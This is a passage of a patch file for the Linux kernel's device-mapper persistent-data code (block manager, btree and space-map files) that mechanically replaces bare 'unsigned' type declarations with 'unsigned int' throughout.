+ static void __del_holder(struct block_lock *lock, struct task_struct *task)
+ {
+-	unsigned h = __find_holder(lock, task);
++	unsigned int h = __find_holder(lock, task);
+ 	lock->holders[h] = NULL;
+ 	put_task_struct(task);
+ }
+ 
+ static int __check_holder(struct block_lock *lock)
+ {
+-	unsigned i;
++	unsigned int i;
+ 
+ 	for (i = 0; i < MAX_HOLDERS; i++) {
+ 		if (lock->holders[i] == current) {
+@@ -376,8 +376,8 @@ struct dm_block_manager {
+ };
+ 
+ struct dm_block_manager *dm_block_manager_create(struct block_device *bdev,
+-						 unsigned block_size,
+-						 unsigned max_held_per_thread)
++						 unsigned int block_size,
++						 unsigned int max_held_per_thread)
+ {
+ 	int r;
+ 	struct dm_block_manager *bm;
+@@ -415,7 +415,7 @@ void dm_block_manager_destroy(struct dm_block_manager *bm)
+ }
+ EXPORT_SYMBOL_GPL(dm_block_manager_destroy);
+ 
+-unsigned dm_bm_block_size(struct dm_block_manager *bm)
++unsigned int dm_bm_block_size(struct dm_block_manager *bm)
+ {
+ 	return dm_bufio_get_block_size(bm->bufio);
+ }
+diff --git a/drivers/md/persistent-data/dm-block-manager.h b/drivers/md/persistent-data/dm-block-manager.h
+index e728937f376a3..58a23b8ec1902 100644
+--- a/drivers/md/persistent-data/dm-block-manager.h
++++ b/drivers/md/persistent-data/dm-block-manager.h
+@@ -32,11 +32,11 @@ void *dm_block_data(struct dm_block *b);
+  */
+ struct dm_block_manager;
+ struct dm_block_manager *dm_block_manager_create(
+-	struct block_device *bdev, unsigned block_size,
+-	unsigned max_held_per_thread);
++	struct block_device *bdev, unsigned int block_size,
++	unsigned int max_held_per_thread);
+ void dm_block_manager_destroy(struct dm_block_manager *bm);
+ 
+-unsigned dm_bm_block_size(struct dm_block_manager *bm);
++unsigned int dm_bm_block_size(struct dm_block_manager *bm);
+ dm_block_t dm_bm_nr_blocks(struct dm_block_manager *bm);
+ 
+ /*----------------------------------------------------------------*/
+diff --git a/drivers/md/persistent-data/dm-btree-remove.c b/drivers/md/persistent-data/dm-btree-remove.c
+index 4ead31e0d8ce5..ac213138b0217 100644
+--- a/drivers/md/persistent-data/dm-btree-remove.c
++++ b/drivers/md/persistent-data/dm-btree-remove.c
+@@ -124,10 +124,10 @@ static int node_copy(struct btree_node *left, struct btree_node *right, int shif
+ /*
+  * Delete a specific entry from a leaf node.
+  */
+-static void delete_at(struct btree_node *n, unsigned index)
++static void delete_at(struct btree_node *n, unsigned int index)
+ {
+-	unsigned nr_entries = le32_to_cpu(n->header.nr_entries);
+-	unsigned nr_to_copy = nr_entries - (index + 1);
++	unsigned int nr_entries = le32_to_cpu(n->header.nr_entries);
++	unsigned int nr_to_copy = nr_entries - (index + 1);
+ 	uint32_t value_size = le32_to_cpu(n->header.value_size);
+ 	BUG_ON(index >= nr_entries);
+ 
+@@ -144,20 +144,20 @@ static void delete_at(struct btree_node *n, unsigned index)
+ 	n->header.nr_entries = cpu_to_le32(nr_entries - 1);
+ }
+ 
+-static unsigned merge_threshold(struct btree_node *n)
++static unsigned int merge_threshold(struct btree_node *n)
+ {
+ 	return le32_to_cpu(n->header.max_entries) / 3;
+ }
+ 
+ struct child {
+-	unsigned index;
++	unsigned int index;
+ 	struct dm_block *block;
+ 	struct btree_node *n;
+ };
+ 
+ static int init_child(struct dm_btree_info *info, struct dm_btree_value_type *vt,
+ 		      struct btree_node *parent,
+-		      unsigned index, struct child *result)
++		      unsigned int index, struct child *result)
+ {
+ 	int r, inc;
+ 	dm_block_t root;
+@@ -263,7 +263,7 @@ static int __rebalance2(struct dm_btree_info *info, struct btree_node *parent,
+ 		/*
+ 		 * Rebalance.
+ 		 */
+-		unsigned target_left = (nr_left + nr_right) / 2;
++		unsigned int target_left = (nr_left + nr_right) / 2;
+ 		ret = shift(left, right, nr_left - target_left);
+ 		if (ret)
+ 			return ret;
+@@ -273,7 +273,7 @@ static int __rebalance2(struct dm_btree_info *info, struct btree_node *parent,
+ }
+ 
+ static int rebalance2(struct shadow_spine *s, struct dm_btree_info *info,
+-		      struct dm_btree_value_type *vt, unsigned left_index)
++		      struct dm_btree_value_type *vt, unsigned int left_index)
+ {
+ 	int r;
+ 	struct btree_node *parent;
+@@ -310,7 +310,7 @@ static int delete_center_node(struct dm_btree_info *info, struct btree_node *par
+ 			      uint32_t nr_left, uint32_t nr_center, uint32_t nr_right)
+ {
+ 	uint32_t max_entries = le32_to_cpu(left->header.max_entries);
+-	unsigned shift = min(max_entries - nr_left, nr_center);
++	unsigned int shift = min(max_entries - nr_left, nr_center);
+ 
+ 	if (nr_left + shift > max_entries) {
+ 		DMERR("node shift out of bounds");
+@@ -351,10 +351,10 @@ static int redistribute3(struct dm_btree_info *info, struct btree_node *parent,
+ {
+ 	int s, ret;
+ 	uint32_t max_entries = le32_to_cpu(left->header.max_entries);
+-	unsigned total = nr_left + nr_center + nr_right;
+-	unsigned target_right = total / 3;
+-	unsigned remainder = (target_right * 3) != total;
+-	unsigned target_left = target_right + remainder;
++	unsigned int total = nr_left + nr_center + nr_right;
++	unsigned int target_right = total / 3;
++	unsigned int remainder = (target_right * 3) != total;
++	unsigned int target_left = target_right + remainder;
+ 
+ 	BUG_ON(target_left > max_entries);
+ 	BUG_ON(target_right > max_entries);
+@@ -422,7 +422,7 @@ static int __rebalance3(struct dm_btree_info *info, struct btree_node *parent,
+ 	uint32_t nr_center = le32_to_cpu(center->header.nr_entries);
+ 	uint32_t nr_right = le32_to_cpu(right->header.nr_entries);
+ 
+-	unsigned threshold = merge_threshold(left) * 4 + 1;
++	unsigned int threshold = merge_threshold(left) * 4 + 1;
+ 
+ 	if ((left->header.max_entries != center->header.max_entries) ||
+ 	    (center->header.max_entries != right->header.max_entries)) {
+@@ -440,7 +440,7 @@ static int __rebalance3(struct dm_btree_info *info, struct btree_node *parent,
+ }
+ 
+ static int rebalance3(struct shadow_spine *s, struct dm_btree_info *info,
+-		      struct dm_btree_value_type *vt, unsigned left_index)
++		      struct dm_btree_value_type *vt, unsigned int left_index)
+ {
+ 	int r;
+ 	struct btree_node *parent = dm_block_data(shadow_current(s));
+@@ -519,7 +519,7 @@ static int rebalance_children(struct shadow_spine *s,
+ 	return r;
+ }
+ 
+-static int do_leaf(struct btree_node *n, uint64_t key, unsigned *index)
++static int do_leaf(struct btree_node *n, uint64_t key, unsigned int *index)
+ {
+ 	int i = lower_bound(n, key);
+ 
+@@ -539,7 +539,7 @@ static int do_leaf(struct btree_node *n, uint64_t key, unsigned *index)
+  */
+ static int remove_raw(struct shadow_spine *s, struct dm_btree_info *info,
+ 		      struct dm_btree_value_type *vt, dm_block_t root,
+-		      uint64_t key, unsigned *index)
++		      uint64_t key, unsigned int *index)
+ {
+ 	int i = *index, r;
+ 	struct btree_node *n;
+@@ -589,7 +589,7 @@ static int remove_raw(struct shadow_spine *s, struct dm_btree_info *info,
+ int dm_btree_remove(struct dm_btree_info *info, dm_block_t root,
+ 		    uint64_t *keys, dm_block_t *new_root)
+ {
+-	unsigned level, last_level = info->levels - 1;
++	unsigned int level, last_level = info->levels - 1;
+ 	int index = 0, r = 0;
+ 	struct shadow_spine spine;
+ 	struct btree_node *n;
+@@ -601,7 +601,7 @@ int dm_btree_remove(struct dm_btree_info *info, dm_block_t root,
+ 		r = remove_raw(&spine, info,
+ 			       (level == last_level ?
+ 				&info->value_type : &le64_vt),
+-			       root, keys[level], (unsigned *)&index);
++			       root, keys[level], (unsigned int *)&index);
+ 		if (r < 0)
+ 			break;
+ 
+@@ -685,9 +685,9 @@ static int remove_nearest(struct shadow_spine *s, struct dm_btree_info *info,
+ 
+ static int remove_one(struct dm_btree_info *info, dm_block_t root,
+ 		      uint64_t *keys, uint64_t end_key,
+-		      dm_block_t *new_root, unsigned *nr_removed)
++		      dm_block_t *new_root, unsigned int *nr_removed)
+ {
+-	unsigned level, last_level = info->levels - 1;
++	unsigned int level, last_level = info->levels - 1;
+ 	int index = 0, r = 0;
+ 	struct shadow_spine spine;
+ 	struct btree_node *n;
+@@ -698,7 +698,7 @@ static int remove_one(struct dm_btree_info *info, dm_block_t root,
+ 	init_shadow_spine(&spine, info);
+ 	for (level = 0; level < last_level; level++) {
+ 		r = remove_raw(&spine, info, &le64_vt,
+-			       root, keys[level], (unsigned *) &index);
++			       root, keys[level], (unsigned int *) &index);
+ 		if (r < 0)
+ 			goto out;
+ 
+@@ -742,7 +742,7 @@ out:
+ 
+ int dm_btree_remove_leaves(struct dm_btree_info *info, dm_block_t root,
+ 			   uint64_t *first_key, uint64_t end_key,
+-			   dm_block_t *new_root, unsigned *nr_removed)
++			   dm_block_t *new_root, unsigned int *nr_removed)
+ {
+ 	int r;
+ 
+diff --git a/drivers/md/persistent-data/dm-btree-spine.c b/drivers/md/persistent-data/dm-btree-spine.c
+index e653458888a7c..45a39d4f1c10f 100644
+--- a/drivers/md/persistent-data/dm-btree-spine.c
++++ b/drivers/md/persistent-data/dm-btree-spine.c
+@@ -234,12 +234,12 @@ dm_block_t shadow_root(struct shadow_spine *s)
+ 	return s->root;
+ }
+ 
+-static void le64_inc(void *context, const void *value_le, unsigned count)
++static void le64_inc(void *context, const void *value_le, unsigned int count)
+ {
+ 	dm_tm_with_runs(context, value_le, count, dm_tm_inc_range);
+ }
+ 
+-static void le64_dec(void *context, const void *value_le, unsigned count)
++static void le64_dec(void *context, const void *value_le, unsigned int count)
+ {
+ 	dm_tm_with_runs(context, value_le, count, dm_tm_dec_range);
+ }
+diff --git a/drivers/md/persistent-data/dm-btree.c b/drivers/md/persistent-data/dm-btree.c
+index 5ce64e93aae74..1cc783d7030d8 100644
+--- a/drivers/md/persistent-data/dm-btree.c
++++ b/drivers/md/persistent-data/dm-btree.c
+@@ -23,8 +23,8 @@ static void memcpy_disk(void *dest, const void *src, size_t len)
+ 	__dm_unbless_for_disk(src);
+ }
+ 
+-static void array_insert(void *base, size_t elt_size, unsigned nr_elts,
+-			 unsigned index, void *elt)
++static void array_insert(void *base, size_t elt_size, unsigned int nr_elts,
++			 unsigned int index, void *elt)
+ 	__dm_written_to_disk(elt)
+ {
+ 	if (index < nr_elts)
+@@ -80,7 +80,7 @@ void inc_children(struct dm_transaction_manager *tm, struct btree_node *n,
+ 		vt->inc(vt->context, value_ptr(n, 0), nr_entries);
+ }
+ 
+-static int insert_at(size_t value_size, struct btree_node *node, unsigned index,
++static int insert_at(size_t value_size, struct btree_node *node, unsigned int index,
+ 		     uint64_t key, void *value)
+ 	__dm_written_to_disk(value)
+ {
+@@ -162,9 +162,9 @@ EXPORT_SYMBOL_GPL(dm_btree_empty);
+ struct frame {
+ 	struct dm_block *b;
+ 	struct btree_node *n;
+-	unsigned level;
+-	unsigned nr_children;
+-	unsigned current_child;
++	unsigned int level;
++	unsigned int nr_children;
++	unsigned int current_child;
+ };
+ 
+ struct del_stack {
+@@ -193,7 +193,7 @@ static int unprocessed_frames(struct del_stack *s)
+ 
+ static void prefetch_children(struct del_stack *s, struct frame *f)
+ {
+-	unsigned i;
++	unsigned int i;
+ 	struct dm_block_manager *bm = dm_tm_get_bm(s->tm);
+ 
+ 	for (i = 0; i < f->nr_children; i++)
+@@ -205,7 +205,7 @@ static bool is_internal_level(struct dm_btree_info *info, struct frame *f)
+ 	return f->level < (info->levels - 1);
+ }
+ 
+-static int push_frame(struct del_stack *s, dm_block_t b, unsigned level)
++static int push_frame(struct del_stack *s, dm_block_t b, unsigned int level)
+ {
+ 	int r;
+ 	uint32_t ref_count;
+@@ -371,7 +371,7 @@ static int btree_lookup_raw(struct ro_spine *s, dm_block_t block, uint64_t key,
+ int dm_btree_lookup(struct dm_btree_info *info, dm_block_t root,
+ 		    uint64_t *keys, void *value_le)
+ {
+-	unsigned level, last_level = info->levels - 1;
++	unsigned int level, last_level = info->levels - 1;
+ 	int r = -ENODATA;
+ 	uint64_t rkey;
+ 	__le64 internal_value_le;
+@@ -467,7 +467,7 @@ out:
+ int dm_btree_lookup_next(struct dm_btree_info *info, dm_block_t root,
+ 			 uint64_t *keys, uint64_t *rkey, void *value_le)
+ {
+-	unsigned level;
++	unsigned int level;
+ 	int r = -ENODATA;
+ 	__le64 internal_value_le;
+ 	struct ro_spine spine;
+@@ -502,9 +502,9 @@ EXPORT_SYMBOL_GPL(dm_btree_lookup_next);
+  * Copies entries from one region of a btree node to another.  The regions
+  * must not overlap.
+  */
+-static void copy_entries(struct btree_node *dest, unsigned dest_offset,
+-			 struct btree_node *src, unsigned src_offset,
+-			 unsigned count)
++static void copy_entries(struct btree_node *dest, unsigned int dest_offset,
++			 struct btree_node *src, unsigned int src_offset,
++			 unsigned int count)
+ {
+ 	size_t value_size = le32_to_cpu(dest->header.value_size);
+ 	memcpy(dest->keys + dest_offset, src->keys + src_offset, count * sizeof(uint64_t));
+@@ -515,9 +515,9 @@ static void copy_entries(struct btree_node *dest, unsigned dest_offset,
+  * Moves entries from one region fo a btree node to another.  The regions
+  * may overlap.
+  */
+-static void move_entries(struct btree_node *dest, unsigned dest_offset,
+-			 struct btree_node *src, unsigned src_offset,
+-			 unsigned count)
++static void move_entries(struct btree_node *dest, unsigned int dest_offset,
++			 struct btree_node *src, unsigned int src_offset,
++			 unsigned int count)
+ {
+ 	size_t value_size = le32_to_cpu(dest->header.value_size);
+ 	memmove(dest->keys + dest_offset, src->keys + src_offset, count * sizeof(uint64_t));
+@@ -528,7 +528,7 @@ static void move_entries(struct btree_node *dest, unsigned dest_offset,
+  * Erases the first 'count' entries of a btree node, shifting following
+  * entries down into their place.
+  */
+-static void shift_down(struct btree_node *n, unsigned count)
++static void shift_down(struct btree_node *n, unsigned int count)
+ {
+ 	move_entries(n, 0, n, count, le32_to_cpu(n->header.nr_entries) - count);
+ }
+@@ -537,7 +537,7 @@ static void shift_down(struct btree_node *n, unsigned count)
+  * Moves entries in a btree node up 'count' places, making space for
+  * new entries at the start of the node.
+  */
+-static void shift_up(struct btree_node *n, unsigned count)
++static void shift_up(struct btree_node *n, unsigned int count)
+ {
+ 	move_entries(n, count, n, 0, le32_to_cpu(n->header.nr_entries));
+ }
+@@ -548,18 +548,18 @@ static void shift_up(struct btree_node *n, unsigned count)
+  */
+ static void redistribute2(struct btree_node *left, struct btree_node *right)
+ {
+-	unsigned nr_left = le32_to_cpu(left->header.nr_entries);
+-	unsigned nr_right = le32_to_cpu(right->header.nr_entries);
+-	unsigned total = nr_left + nr_right;
+-	unsigned target_left = total / 2;
+-	unsigned target_right = total - target_left;
++	unsigned int nr_left = le32_to_cpu(left->header.nr_entries);
++	unsigned int nr_right = le32_to_cpu(right->header.nr_entries);
++	unsigned int total = nr_left + nr_right;
++	unsigned int target_left = total / 2;
++	unsigned int target_right = total - target_left;
+ 
+ 	if (nr_left < target_left) {
+-		unsigned delta = target_left - nr_left;
++		unsigned int delta = target_left - nr_left;
+ 		copy_entries(left, nr_left, right, 0, delta);
+ 		shift_down(right, delta);
+ 	} else if (nr_left > target_left) {
+-		unsigned delta = nr_left - target_left;
++		unsigned int delta = nr_left - target_left;
+ 		if (nr_right)
+ 			shift_up(right, delta);
+ 		copy_entries(right, 0, left, target_left, delta);
+@@ -576,10 +576,10 @@ static void redistribute2(struct btree_node *left, struct btree_node *right)
+ static void redistribute3(struct btree_node *left, struct btree_node *center,
+ 			  struct btree_node *right)
+ {
+-	unsigned nr_left = le32_to_cpu(left->header.nr_entries);
+-	unsigned nr_center = le32_to_cpu(center->header.nr_entries);
+-	unsigned nr_right = le32_to_cpu(right->header.nr_entries);
+-	unsigned total, target_left, target_center, target_right;
++	unsigned int nr_left = le32_to_cpu(left->header.nr_entries);
++	unsigned int nr_center = le32_to_cpu(center->header.nr_entries);
++	unsigned int nr_right = le32_to_cpu(right->header.nr_entries);
++	unsigned int total, target_left, target_center, target_right;
+ 
+ 	BUG_ON(nr_center);
+ 
+@@ -589,19 +589,19 @@ static void redistribute3(struct btree_node *left, struct btree_node *center,
+ 	target_right = (total - target_left - target_center);
+ 
+ 	if (nr_left < target_left) {
+-		unsigned left_short = target_left - nr_left;
++		unsigned int left_short = target_left - nr_left;
+ 		copy_entries(left, nr_left, right, 0, left_short);
+ 		copy_entries(center, 0, right, left_short, target_center);
+ 		shift_down(right, nr_right - target_right);
+ 
+ 	} else if (nr_left < (target_left + target_center)) {
+-		unsigned left_to_center = nr_left - target_left;
++		unsigned int left_to_center = nr_left - target_left;
+ 		copy_entries(center, 0, left, target_left, left_to_center);
+ 		copy_entries(center, left_to_center, right, 0, target_center - left_to_center);
+ 		shift_down(right, nr_right - target_right);
+ 
+ 	} else {
+-		unsigned right_short = target_right - nr_right;
++		unsigned int right_short = target_right - nr_right;
+ 		shift_up(right, right_short);
+ 		copy_entries(right, 0, left, nr_left - right_short, right_short);
+ 		copy_entries(center, 0, left, target_left, nr_left - target_left);
+@@ -642,7 +642,7 @@ static void redistribute3(struct btree_node *left, struct btree_node *center,
+  *
+  * Where A* is a shadow of A.
+  */
+-static int split_one_into_two(struct shadow_spine *s, unsigned parent_index,
++static int split_one_into_two(struct shadow_spine *s, unsigned int parent_index,
+ 			      struct dm_btree_value_type *vt, uint64_t key)
+ {
+ 	int r;
+@@ -696,7 +696,7 @@ static int split_one_into_two(struct shadow_spine *s, unsigned parent_index,
+  * to the new shadow.
+  */
+ static int shadow_child(struct dm_btree_info *info, struct dm_btree_value_type *vt,
+-			struct btree_node *parent, unsigned index,
++			struct btree_node *parent, unsigned int index,
+ 			struct dm_block **result)
+ {
+ 	int r, inc;
+@@ -725,11 +725,11 @@ static int shadow_child(struct dm_btree_info *info, struct dm_btree_value_type *
+  * Splits two nodes into three.  This is more work, but results in fuller
+  * nodes, so saves metadata space.
+  */
+-static int split_two_into_three(struct shadow_spine *s, unsigned parent_index,
++static int split_two_into_three(struct shadow_spine *s, unsigned int parent_index,
+                                 struct dm_btree_value_type *vt, uint64_t key)
+ {
+ 	int r;
+-	unsigned middle_index;
++	unsigned int middle_index;
+ 	struct dm_block *left, *middle, *right, *parent;
+ 	struct btree_node *ln, *rn, *mn, *pn;
+ 	__le64 location;
+@@ -830,7 +830,7 @@ static int btree_split_beneath(struct shadow_spine *s, uint64_t key)
+ {
+ 	int r;
+ 	size_t size;
+-	unsigned nr_left, nr_right;
++	unsigned int nr_left, nr_right;
+ 	struct dm_block *left, *right, *new_parent;
+ 	struct btree_node *pn, *ln, *rn;
+ 	__le64 val;
+@@ -904,7 +904,7 @@ static int btree_split_beneath(struct shadow_spine *s, uint64_t key)
+  * Redistributes a node's entries with its left sibling.
+  */
+ static int rebalance_left(struct shadow_spine *s, struct dm_btree_value_type *vt,
+-			  unsigned parent_index, uint64_t key)
++			  unsigned int parent_index, uint64_t key)
+ {
+ 	int r;
+ 	struct dm_block *sib;
+@@ -933,7 +933,7 @@ static int rebalance_left(struct shadow_spine *s, struct dm_btree_value_type *vt
+  * Redistributes a nodes entries with its right sibling.
+  */
+ static int rebalance_right(struct shadow_spine *s, struct dm_btree_value_type *vt,
+-			   unsigned parent_index, uint64_t key)
++			   unsigned int parent_index, uint64_t key)
+ {
+ 	int r;
+ 	struct dm_block *sib;
+@@ -961,10 +961,10 @@ static int rebalance_right(struct shadow_spine *s, struct dm_btree_value_type *v
+ /*
+  * Returns the number of spare entries in a node.
+  */
+-static int get_node_free_space(struct dm_btree_info *info, dm_block_t b, unsigned *space)
++static int get_node_free_space(struct dm_btree_info *info, dm_block_t b, unsigned int *space)
+ {
+ 	int r;
+-	unsigned nr_entries;
++	unsigned int nr_entries;
+ 	struct dm_block *block;
+ 	struct btree_node *node;
+ 
+@@ -990,12 +990,12 @@ static int get_node_free_space(struct dm_btree_info *info, dm_block_t b, unsigne
+  */
+ #define SPACE_THRESHOLD 8
+ static int rebalance_or_split(struct shadow_spine *s, struct dm_btree_value_type *vt,
+-			      unsigned parent_index, uint64_t key)
++			      unsigned int parent_index, uint64_t key)
+ {
+ 	int r;
+ 	struct btree_node *parent = dm_block_data(shadow_parent(s));
+-	unsigned nr_parent = le32_to_cpu(parent->header.nr_entries);
+-	unsigned free_space;
++	unsigned int nr_parent = le32_to_cpu(parent->header.nr_entries);
++	unsigned int free_space;
+ 	int left_shared = 0, right_shared = 0;
+ 
+ 	/* Should we move entries to the left sibling? */
+@@ -1080,7 +1080,7 @@ static bool has_space_for_insert(struct btree_node *node, uint64_t key)
+ 
+ static int btree_insert_raw(struct shadow_spine *s, dm_block_t root,
+ 			    struct dm_btree_value_type *vt,
+-			    uint64_t key, unsigned *index)
++			    uint64_t key, unsigned int *index)
+ {
+ 	int r, i = *index, top = 1;
+ 	struct btree_node *node;
+@@ -1214,7 +1214,7 @@ int btree_get_overwrite_leaf(struct dm_btree_info *info, dm_block_t root,
+ }
+ 
+ static bool need_insert(struct btree_node *node, uint64_t *keys,
+-			unsigned level, unsigned index)
++			unsigned int level, unsigned int index)
+ {
+         return ((index >= le32_to_cpu(node->header.nr_entries)) ||
+ 		(le64_to_cpu(node->keys[index]) != keys[level]));
+@@ -1226,7 +1226,7 @@ static int insert(struct dm_btree_info *info, dm_block_t root,
+ 		  __dm_written_to_disk(value)
+ {
+ 	int r;
+-	unsigned level, index = -1, last_level = info->levels - 1;
++	unsigned int level, index = -1, last_level = info->levels - 1;
+ 	dm_block_t block = root;
+ 	struct shadow_spine spine;
+ 	struct btree_node *n;
+@@ -1412,7 +1412,7 @@ static int walk_node(struct dm_btree_info *info, dm_block_t block,
+ 		     void *context)
+ {
+ 	int r;
+-	unsigned i, nr;
++	unsigned int i, nr;
+ 	struct dm_block *node;
+ 	struct btree_node *n;
+ 	uint64_t keys;
+@@ -1455,7 +1455,7 @@ EXPORT_SYMBOL_GPL(dm_btree_walk);
+ 
+ static void prefetch_values(struct dm_btree_cursor *c)
+ {
+-	unsigned i, nr;
++	unsigned int i, nr;
+ 	__le64 value_le;
+ 	struct cursor_node *n = c->nodes + c->depth - 1;
+ 	struct btree_node *bn = dm_block_data(n->b);
+diff --git a/drivers/md/persistent-data/dm-btree.h b/drivers/md/persistent-data/dm-btree.h
+index d2ae5aa4d00b6..5566e7c32e829 100644
+--- a/drivers/md/persistent-data/dm-btree.h
++++ b/drivers/md/persistent-data/dm-btree.h
+@@ -58,14 +58,14 @@ struct dm_btree_value_type {
+ 	 * somewhere.) This method is _not_ called for insertion of a new
+ 	 * value: It is assumed the ref count is already 1.
+ 	 */
+-	void (*inc)(void *context, const void *value, unsigned count);
++	void (*inc)(void *context, const void *value, unsigned int count);
+ 
+ 	/*
+ 	 * These values are being deleted.  The btree takes care of freeing
+ 	 * the memory pointed to by @value.  Often the del function just
+ 	 * needs to decrement a reference counts somewhere.
+ 	 */
+-	void (*dec)(void *context, const void *value, unsigned count);
++	void (*dec)(void *context, const void *value, unsigned int count);
+ 
+ 	/*
+ 	 * A test for equality between two values.  When a value is
+@@ -84,7 +84,7 @@ struct dm_btree_info {
+ 	/*
+ 	 * Number of nested btrees. (Not the depth of a single tree.)
+ 	 */
+-	unsigned levels;
++	unsigned int levels;
+ 	struct dm_btree_value_type value_type;
+ };
+ 
+@@ -149,7 +149,7 @@ int dm_btree_remove(struct dm_btree_info *info, dm_block_t root,
+  */
+ int dm_btree_remove_leaves(struct dm_btree_info *info, dm_block_t root,
+ 			   uint64_t *keys, uint64_t end_key,
+-			   dm_block_t *new_root, unsigned *nr_removed);
++			   dm_block_t *new_root, unsigned int *nr_removed);
+ 
+ /*
+  * Returns < 0 on failure.  Otherwise the number of key entries that have
+@@ -188,7 +188,7 @@ int dm_btree_walk(struct dm_btree_info *info, dm_block_t root,
+ 
+ struct cursor_node {
+ 	struct dm_block *b;
+-	unsigned index;
++	unsigned int index;
+ };
+ 
+ struct dm_btree_cursor {
+@@ -196,7 +196,7 @@ struct dm_btree_cursor {
+ 	dm_block_t root;
+ 
+ 	bool prefetch_leaves;
+-	unsigned depth;
++	unsigned int depth;
+ 	struct cursor_node nodes[DM_BTREE_CURSOR_MAX_DEPTH];
+ };
+ 
+diff --git a/drivers/md/persistent-data/dm-persistent-data-internal.h b/drivers/md/persistent-data/dm-persistent-data-internal.h
+index c49e26fff36c8..b945a2be93fb2 100644
+--- a/drivers/md/persistent-data/dm-persistent-data-internal.h
++++ b/drivers/md/persistent-data/dm-persistent-data-internal.h
+@@ -9,11 +9,11 @@
+ 
+ #include "dm-block-manager.h"
+ 
+-static inline unsigned dm_hash_block(dm_block_t b, unsigned hash_mask)
++static inline unsigned int dm_hash_block(dm_block_t b, unsigned int hash_mask)
+ {
+-	const unsigned BIG_PRIME = 4294967291UL;
++	const unsigned int BIG_PRIME = 4294967291UL;
+ 
+-	return (((unsigned) b) * BIG_PRIME) & hash_mask;
++	return (((unsigned int) b) * BIG_PRIME) & hash_mask;
+ }
+ 
+ #endif	/* _PERSISTENT_DATA_INTERNAL_H */
+diff --git a/drivers/md/persistent-data/dm-space-map-common.c b/drivers/md/persistent-data/dm-space-map-common.c
+index bfbfa750e0160..af800efed9f3c 100644
+--- a/drivers/md/persistent-data/dm-space-map-common.c
++++ b/drivers/md/persistent-data/dm-space-map-common.c
+@@ -126,7 +126,7 @@ static void *dm_bitmap_data(struct dm_block *b)
+ 
+ #define WORD_MASK_HIGH 0xAAAAAAAAAAAAAAAAULL
+ 
+-static unsigned dm_bitmap_word_used(void *addr, unsigned b)
++static unsigned int dm_bitmap_word_used(void *addr, unsigned int b)
+ {
+ 	__le64 *words_le = addr;
+ 	__le64 *w_le = words_le + (b >> ENTRIES_SHIFT);
+@@ -137,11 +137,11 @@ static unsigned dm_bitmap_word_used(void *addr, unsigned b)
+ 	return !(~bits & mask);
+ }
+ 
+-static unsigned sm_lookup_bitmap(void *addr, unsigned b)
++static unsigned int sm_lookup_bitmap(void *addr, unsigned int b)
+ {
+ 	__le64 *words_le = addr;
+ 	__le64 *w_le = words_le + (b >> ENTRIES_SHIFT);
+-	unsigned hi, lo;
++	unsigned int hi, lo;
+ 
+ 	b = (b & (ENTRIES_PER_WORD - 1)) << 1;
+ 	hi = !!test_bit_le(b, (void *) w_le);
+@@ -149,7 +149,7 @@ static unsigned sm_lookup_bitmap(void *addr, unsigned b)
+ 	return (hi << 1) | lo;
+ }
+ 
+-static void sm_set_bitmap(void *addr, unsigned b, unsigned val)
++static void sm_set_bitmap(void *addr, unsigned int b, unsigned int val)
+ {
+ 	__le64 *words_le = addr;
+ 	__le64 *w_le = words_le + (b >> ENTRIES_SHIFT);
+@@ -167,8 +167,8 @@ static void sm_set_bitmap(void *addr, unsigned b, unsigned val)
+ 		__clear_bit_le(b + 1, (void *) w_le);
+ }
+ 
+-static int sm_find_free(void *addr, unsigned begin, unsigned end,
+-			unsigned *result)
++static int sm_find_free(void *addr, unsigned int begin, unsigned int end,
++			unsigned int *result)
+ {
+ 	while (begin < end) {
+ 		if (!(begin & (ENTRIES_PER_WORD - 1)) &&
+@@ -237,7 +237,7 @@ int sm_ll_extend(struct ll_disk *ll, dm_block_t extra_blocks)
+ {
+ 	int r;
+ 	dm_block_t i, nr_blocks, nr_indexes;
+-	unsigned old_blocks, blocks;
++	unsigned int old_blocks, blocks;
+ 
+ 	nr_blocks = ll->nr_blocks + extra_blocks;
+ 	old_blocks = dm_sector_div_up(ll->nr_blocks, ll->entries_per_block);
+@@ -351,7 +351,7 @@ int sm_ll_find_free_block(struct ll_disk *ll, dm_block_t begin,
+ 
+ 	for (i = index_begin; i < index_end; i++, begin = 0) {
+ 		struct dm_block *blk;
+-		unsigned position;
++		unsigned int position;
+ 		uint32_t bit_end;
+ 
+ 		r = ll->load_ie(ll, i, &ie_disk);
+@@ -369,7 +369,7 @@ int sm_ll_find_free_block(struct ll_disk *ll, dm_block_t begin,
+ 		bit_end = (i == index_end - 1) ?  end : ll->entries_per_block;
+ 
+ 		r = sm_find_free(dm_bitmap_data(blk),
+-				 max_t(unsigned, begin, le32_to_cpu(ie_disk.none_free_before)),
++				 max_t(unsigned int, begin, le32_to_cpu(ie_disk.none_free_before)),
+ 				 bit_end, &position);
+ 		if (r == -ENOSPC) {
+ 			/*
+@@ -1097,7 +1097,7 @@ static inline int ie_cache_writeback(struct ll_disk *ll, struct ie_cache *iec)
+ 			       &iec->index, &iec->ie, &ll->bitmap_root);
+ }
+ 
+-static inline unsigned hash_index(dm_block_t index)
++static inline unsigned int hash_index(dm_block_t index)
+ {
+ 	return dm_hash_block(index, IE_CACHE_MASK);
+ }
+@@ -1106,7 +1106,7 @@ static int disk_ll_load_ie(struct ll_disk *ll, dm_block_t index,
+ 			   struct disk_index_entry *ie)
+ {
+ 	int r;
+-	unsigned h = hash_index(index);
++	unsigned int h = hash_index(index);
+ 	struct ie_cache *iec = ll->ie_cache + h;
+ 
+ 	if (iec->valid) {
+@@ -1137,7 +1137,7 @@ static int disk_ll_save_ie(struct ll_disk *ll, dm_block_t index,
+ 			   struct disk_index_entry *ie)
+ {
+ 	int r;
+-	unsigned h = hash_index(index);
++	unsigned int h = hash_index(index);
+ 	struct ie_cache *iec = ll->ie_cache + h;
+ 
+ 	ll->bitmap_index_changed = true;
+@@ -1164,7 +1164,7 @@ static int disk_ll_save_ie(struct ll_disk *ll, dm_block_t index,
+ 
+ static int disk_ll_init_index(struct ll_disk *ll)
+ {
+-	unsigned i;
++	unsigned int i;
+ 	for (i = 0; i < IE_CACHE_SIZE; i++) {
+ 		struct ie_cache *iec = ll->ie_cache + i;
+ 		iec->valid = false;
+@@ -1186,7 +1186,7 @@ static dm_block_t disk_ll_max_entries(struct ll_disk *ll)
+ static int disk_ll_commit(struct ll_disk *ll)
+ {
+ 	int r = 0;
+-	unsigned i;
++	unsigned int i;
+ 
+ 	for (i = 0; i < IE_CACHE_SIZE; i++) {
+ 		struct ie_cache *iec = ll->ie_cache + i;
